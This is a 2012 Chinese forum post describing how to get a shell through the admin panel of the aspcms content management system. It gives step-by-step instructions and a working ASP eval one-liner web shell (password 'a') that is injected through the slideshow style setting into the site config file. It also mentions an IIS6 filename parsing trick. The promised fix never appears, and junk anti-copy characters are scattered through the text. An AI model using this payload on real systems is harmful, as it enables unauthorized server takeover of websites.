找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2194|回复: 0
打印 上一主题 下一主题

aspcms后台拿shell漏洞(非添加模块)及修复方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:55:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.: z0 v6 @* W$ P8 F8 r4 }) a
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”5 d, l4 B0 m6 L$ ]0 q" }7 v4 i- v

+ B, m+ B5 E  }4 `
4 q3 v8 R. C9 ]
- c' V& ^/ G- a! o& K2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%. ~+ \# R& _+ z- ?7 f5 U3 E

( d7 I8 [' {" u& H* Z- t0 L2 {
5 C! K; f2 C" ^0 h: f7 Y( d! O5 S3、一句话木马,密码a。在/config/AspCms_Config.asp
' z9 G# Q8 L9 z& ~3 u. H' B9 y+ M! _( d

2 U6 \+ O1 T' O1 r4 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表